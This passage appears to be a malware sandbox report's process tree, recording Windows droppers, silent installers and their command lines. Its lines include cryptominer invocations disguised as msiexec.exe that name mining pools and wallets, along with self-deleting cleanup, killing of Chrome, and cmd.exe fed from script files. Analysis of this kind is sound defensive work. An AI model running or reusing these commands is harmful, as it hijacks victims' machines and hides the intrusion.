- Views/modifies file attributes
PID:12736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE73F6.bat" "4⤵PID:13256
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" cls"4⤵PID:11216
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE753F.bat" "3⤵PID:9280
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"4⤵
- Views/modifies file attributes
PID:10872
-
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
PID:6232
-
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
PID:18012
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE753F.bat"4⤵
- Views/modifies file attributes
PID:9928
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE753F.bat" "4⤵PID:6200
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" cls"4⤵PID:15816
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-1NGC1.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-1NGC1.tmp\lylal220.tmp" /SL5="$402B8,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"1⤵PID:4280
-
C:\Users\Admin\AppData\Local\Temp\is-7UQM1.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-7UQM1.tmp\Microsoft.exe" /S /UID=lylal2202⤵PID:4888
-
C:\Users\Admin\AppData\Local\Temp\c6-8a99e-b23-fefa2-bfbdc4b9da4b4\Rytitaetido.exe"C:\Users\Admin\AppData\Local\Temp\c6-8a99e-b23-fefa2-bfbdc4b9da4b4\Rytitaetido.exe"3⤵PID:5704
-
-
C:\Program Files\Java\ISLNSBBPAF\irecord.exe"C:\Program Files\Java\ISLNSBBPAF\irecord.exe" /VERYSILENT3⤵PID:1832
-
C:\Users\Admin\AppData\Local\Temp\is-TD3FD.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-TD3FD.tmp\irecord.tmp" /SL5="$402EC,6265333,408064,C:\Program Files\Java\ISLNSBBPAF\irecord.exe" /VERYSILENT4⤵PID:6044
-
-
-
C:\Users\Admin\AppData\Local\Temp\d0-385d3-edf-813b4-a2dd42b788b21\Pyxifovonae.exe"C:\Users\Admin\AppData\Local\Temp\d0-385d3-edf-813b4-a2dd42b788b21\Pyxifovonae.exe"3⤵PID:5536
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f5f4lkej.4r4\md6_6ydj.exe & exit4⤵PID:18004
-
C:\Users\Admin\AppData\Local\Temp\f5f4lkej.4r4\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\f5f4lkej.4r4\md6_6ydj.exe5⤵PID:19304
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 19304 -s 8366⤵
- Program crash
PID:12896
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kqphijpl.stv\askinstall31.exe & exit4⤵PID:18828
-
C:\Users\Admin\AppData\Local\Temp\kqphijpl.stv\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\kqphijpl.stv\askinstall31.exe5⤵PID:18580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kllayvey.lj1\toolspab1.exe & exit4⤵PID:19032
-
C:\Users\Admin\AppData\Local\Temp\kllayvey.lj1\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\kllayvey.lj1\toolspab1.exe5⤵PID:18792
-
C:\Users\Admin\AppData\Local\Temp\kllayvey.lj1\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\kllayvey.lj1\toolspab1.exe6⤵PID:19396
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ew5enkyv.dg1\setup_10.2_mix.exe & exit4⤵PID:13728
-
C:\Users\Admin\AppData\Local\Temp\ew5enkyv.dg1\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\ew5enkyv.dg1\setup_10.2_mix.exe5⤵PID:5420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5fwhdfbn.ejz\GcleanerWW.exe /mixone & exit4⤵PID:14148
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\32icw0s0.mnw\app.exe /8-2222 & exit4⤵PID:6168
-
C:\Users\Admin\AppData\Local\Temp\32icw0s0.mnw\app.exeC:\Users\Admin\AppData\Local\Temp\32icw0s0.mnw\app.exe /8-22225⤵PID:14812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p51l3wgs.wpi\file.exe & exit4⤵PID:14472
-
C:\Users\Admin\AppData\Local\Temp\p51l3wgs.wpi\file.exeC:\Users\Admin\AppData\Local\Temp\p51l3wgs.wpi\file.exe5⤵PID:13784
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"6⤵PID:6624
-
C:\Users\Admin\AppData\Local\Temp\B0ABZ3US9E\setups.exe"C:\Users\Admin\AppData\Local\Temp\B0ABZ3US9E\setups.exe" ll7⤵PID:7716
-
C:\Users\Admin\AppData\Local\Temp\is-1VSMV.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-1VSMV.tmp\setups.tmp" /SL5="$40430,635399,250368,C:\Users\Admin\AppData\Local\Temp\B0ABZ3US9E\setups.exe" ll8⤵PID:7332
-
-
-
C:\Users\Admin\AppData\Local\Temp\DAY3UD6E1W\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\DAY3UD6E1W\multitimer.exe" 0 3060197d33d91c80.94013368 0 1017⤵PID:7264
-
C:\Users\Admin\AppData\Local\Temp\DAY3UD6E1W\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\DAY3UD6E1W\multitimer.exe" 1 3.1617436397.60681eed2bf3d 1018⤵PID:7760
-
C:\Users\Admin\AppData\Local\Temp\DAY3UD6E1W\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\DAY3UD6E1W\multitimer.exe" 2 3.1617436397.60681eed2bf3d9⤵PID:10540
-
C:\Users\Admin\AppData\Local\Temp\va4w1dogy2e\ys01jin4szx.exe"C:\Users\Admin\AppData\Local\Temp\va4w1dogy2e\ys01jin4szx.exe" /ustwo INSTALL10⤵PID:13588
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "ys01jin4szx.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\va4w1dogy2e\ys01jin4szx.exe" & exit11⤵PID:16908
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "ys01jin4szx.exe" /f12⤵
- Kills process with taskkill
PID:6932
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\alwfwuexhmo\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\alwfwuexhmo\Setup3310.exe" /Verysilent /subid=57710⤵PID:5816
-
C:\Users\Admin\AppData\Local\Temp\is-34HC8.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-34HC8.tmp\Setup3310.tmp" /SL5="$2075A,138429,56832,C:\Users\Admin\AppData\Local\Temp\alwfwuexhmo\Setup3310.exe" /Verysilent /subid=57711⤵PID:13952
-
C:\Users\Admin\AppData\Local\Temp\is-51ULQ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-51ULQ.tmp\Setup.exe" /Verysilent12⤵PID:16772
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gmlrbo41pdb\vict.exe"C:\Users\Admin\AppData\Local\Temp\gmlrbo41pdb\vict.exe" /VERYSILENT /id=53510⤵PID:14176
-
C:\Users\Admin\AppData\Local\Temp\is-J6RFI.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-J6RFI.tmp\vict.tmp" /SL5="$107B0,870426,780800,C:\Users\Admin\AppData\Local\Temp\gmlrbo41pdb\vict.exe" /VERYSILENT /id=53511⤵PID:14380
-
C:\Users\Admin\AppData\Local\Temp\is-ASSO9.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-ASSO9.tmp\win1host.exe" 53512⤵PID:15276
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\z5msry3w1r4\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\z5msry3w1r4\cpyrix.exe" /VERYSILENT10⤵PID:6136
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe11⤵PID:18328
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"12⤵PID:15264
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub12⤵PID:7176
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe13⤵PID:15524
-
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe11⤵PID:19072
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"12⤵PID:8864
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\yvoubz44blp\app.exe"C:\Users\Admin\AppData\Local\Temp\yvoubz44blp\app.exe" /8-2310⤵PID:5244
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"6⤵PID:7476
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵PID:8804
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
PID:9944
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"6⤵PID:2112
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"7⤵PID:10108
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install8⤵PID:10032
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"6⤵PID:10400
-
C:\Users\Admin\AppData\Roaming\B013.tmp.exe"C:\Users\Admin\AppData\Roaming\B013.tmp.exe"7⤵PID:11376
-
C:\Users\Admin\AppData\Roaming\B013.tmp.exe"C:\Users\Admin\AppData\Roaming\B013.tmp.exe"8⤵PID:17940
-
-
-
C:\Users\Admin\AppData\Roaming\B719.tmp.exe"C:\Users\Admin\AppData\Roaming\B719.tmp.exe"7⤵PID:11464
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999998⤵PID:17912
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99998⤵PID:11744
-
-
-
C:\Users\Admin\AppData\Roaming\B8A1.tmp.exe"C:\Users\Admin\AppData\Roaming\B8A1.tmp.exe"7⤵PID:11348
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\B8A1.tmp.exe8⤵PID:9796
-
C:\Windows\SysWOW64\timeout.exetimeout /t 39⤵
- Delays execution with timeout.exe
PID:9572
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"7⤵PID:14552
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.18⤵
- Runs ping.exe
PID:15020
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"6⤵PID:15120
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a1jxk1j2.gcw\Four.exe & exit4⤵PID:11988
-
C:\Users\Admin\AppData\Local\Temp\a1jxk1j2.gcw\Four.exeC:\Users\Admin\AppData\Local\Temp\a1jxk1j2.gcw\Four.exe5⤵PID:15948
-
C:\Users\Admin\AppData\Local\Temp\47ZS8CHCRS\setups.exe"C:\Users\Admin\AppData\Local\Temp\47ZS8CHCRS\setups.exe" ll6⤵PID:7124
-
C:\Users\Admin\AppData\Local\Temp\is-2U95N.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-2U95N.tmp\setups.tmp" /SL5="$A03EE,635399,250368,C:\Users\Admin\AppData\Local\Temp\47ZS8CHCRS\setups.exe" ll7⤵PID:5596
-
-
-
C:\Users\Admin\AppData\Local\Temp\GDUP8UXXJG\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\GDUP8UXXJG\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 1046⤵PID:7088
-
C:\Users\Admin\AppData\Local\Temp\GDUP8UXXJG\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\GDUP8UXXJG\multitimer.exe" 1 3.1617436388.60681ee48a1ed 1047⤵PID:9632
-
C:\Users\Admin\AppData\Local\Temp\GDUP8UXXJG\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\GDUP8UXXJG\multitimer.exe" 2 3.1617436388.60681ee48a1ed8⤵PID:10088
-
C:\Users\Admin\AppData\Local\Temp\xqukiodf2xx\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\xqukiodf2xx\Setup3310.exe" /Verysilent /subid=5779⤵PID:13064
-
C:\Users\Admin\AppData\Local\Temp\is-6PRQ0.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-6PRQ0.tmp\Setup3310.tmp" /SL5="$C049A,138429,56832,C:\Users\Admin\AppData\Local\Temp\xqukiodf2xx\Setup3310.exe" /Verysilent /subid=57710⤵PID:12588
-
C:\Users\Admin\AppData\Local\Temp\is-V1RPR.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-V1RPR.tmp\Setup.exe" /Verysilent11⤵PID:17348
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1eogyso0m0j\app.exe"C:\Users\Admin\AppData\Local\Temp\1eogyso0m0j\app.exe" /8-239⤵PID:1688
-
-
C:\Users\Admin\AppData\Local\Temp\rustjv1djmv\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\rustjv1djmv\cpyrix.exe" /VERYSILENT9⤵PID:18056
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe10⤵PID:15756
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"11⤵PID:16680
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub11⤵PID:18404
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe12⤵PID:1436
-
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe10⤵PID:16100
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"11⤵PID:7996
-
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"11⤵PID:17380
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\dcncoitlm20\vict.exe"C:\Users\Admin\AppData\Local\Temp\dcncoitlm20\vict.exe" /VERYSILENT /id=5359⤵PID:13004
-
C:\Users\Admin\AppData\Local\Temp\is-1MGQD.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-1MGQD.tmp\vict.tmp" /SL5="$106FC,870426,780800,C:\Users\Admin\AppData\Local\Temp\dcncoitlm20\vict.exe" /VERYSILENT /id=53510⤵PID:12564
-
C:\Users\Admin\AppData\Local\Temp\is-MCGDC.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-MCGDC.tmp\win1host.exe" 53511⤵PID:7616
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\02xg4el30rz\bz2h3yesmz4.exe"C:\Users\Admin\AppData\Local\Temp\02xg4el30rz\bz2h3yesmz4.exe" /ustwo INSTALL9⤵PID:12972
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "bz2h3yesmz4.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\02xg4el30rz\bz2h3yesmz4.exe" & exit10⤵PID:19004
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "bz2h3yesmz4.exe" /f11⤵
- Kills process with taskkill
PID:5968
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-BRNR1.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-BRNR1.tmp\prolab.tmp" /SL5="$5011A,575243,216576,C:\Program Files\Windows Photo Viewer\DFETAMCNGG\prolab.exe" /VERYSILENT1⤵PID:5328
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5224
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:652
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:12516
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:17908
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:18056
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:8876
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{38207c84-411b-1045-911f-594f53053920}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:8976
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"2⤵PID:9240
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:9328
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:9320
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:12368
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:12892
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:15592
-
C:\Users\Admin\AppData\Local\Temp\A1B1.exeC:\Users\Admin\AppData\Local\Temp\A1B1.exe1⤵PID:11788
-
C:\Users\Admin\AppData\Local\Temp\A57A.exeC:\Users\Admin\AppData\Local\Temp\A57A.exe1⤵PID:11664
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:13960
-
C:\Users\Admin\AppData\Local\Temp\C0A5.exeC:\Users\Admin\AppData\Local\Temp\C0A5.exe1⤵PID:13980
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:13968
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4268
-
C:\Users\Admin\AppData\Local\Temp\D1FB.exeC:\Users\Admin\AppData\Local\Temp\D1FB.exe1⤵PID:5036
-
C:\Users\Admin\AppData\Local\Temp\EA18.exeC:\Users\Admin\AppData\Local\Temp\EA18.exe1⤵PID:15764
-
C:\Users\Admin\AppData\Local\Temp\EA18.exe"C:\Users\Admin\AppData\Local\Temp\EA18.exe"2⤵PID:13836
-
-
C:\Users\Admin\AppData\Local\Temp\EA18.exe"C:\Users\Admin\AppData\Local\Temp\EA18.exe"2⤵PID:13368
-
-
C:\Users\Admin\AppData\Local\Temp\FF28.exeC:\Users\Admin\AppData\Local\Temp\FF28.exe1⤵PID:6664
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"2⤵PID:14248
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\cmd.exe < Dov.pub2⤵PID:19124
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe3⤵PID:7700
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:11804
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:19300
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:5968
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6808
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7104
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7060
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:6384
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4380
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7188
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:18888
-
C:\Users\Admin\AppData\Local\Temp\is-A398V.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-A398V.tmp\setups.tmp" /SL5="$B037E,635399,250368,C:\Users\Admin\AppData\Local\Temp\D041RU04S7\setups.exe" ll1⤵PID:7276
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:724
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10748
-
C:\Users\Admin\AppData\Roaming\icgibgsC:\Users\Admin\AppData\Roaming\icgibgs1⤵PID:12224
-
C:\Users\Admin\AppData\Roaming\icgibgsC:\Users\Admin\AppData\Roaming\icgibgs2⤵PID:816
-
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\bfd45426f5514419b431d9729bf943ae /t 10968 /p 107481⤵PID:11100
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:13532